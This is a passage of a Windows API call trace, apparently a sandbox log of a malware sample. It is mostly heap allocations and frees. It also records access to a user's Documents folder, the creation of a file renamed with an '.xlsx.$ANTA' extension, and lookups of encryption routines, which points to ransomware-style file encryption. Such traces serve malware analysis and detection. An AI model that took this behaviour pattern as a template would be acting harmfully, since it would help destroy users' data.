lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0078.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0078.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.246] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0078.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0078.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0078.246] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0078.246] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0078.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0078.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0078.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.248] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0078.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0078.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0078.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0078.249] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\z6U2MzO.xlsx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\z6u2mzo.xlsx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0078.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.250] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0078.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0078.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0078.250] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0078.250] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0078.250] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0078.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0078.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0078.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0078.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0078.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e01020 [0078.254] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0078.255] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0078.256] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x2d19, lpOverlapped=0x0) returned 1 [0078.257] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0078.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12d19) returned 0x48f0048 [0078.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e01020 | out: hHeap=0x1780000) returned 1 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12d19) returned 0x4902d70 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.261] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12d19) returned 0x48f0048 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0078.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.261] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0078.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0078.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0078.262] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0078.262] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0078.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0078.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12d19) returned 0x48f0048 [0078.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0078.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0078.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12d19) returned 0x4915a98 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0078.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.264] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0078.264] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0078.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0078.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0078.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0078.266] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0078.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0078.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0078.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0078.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0078.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 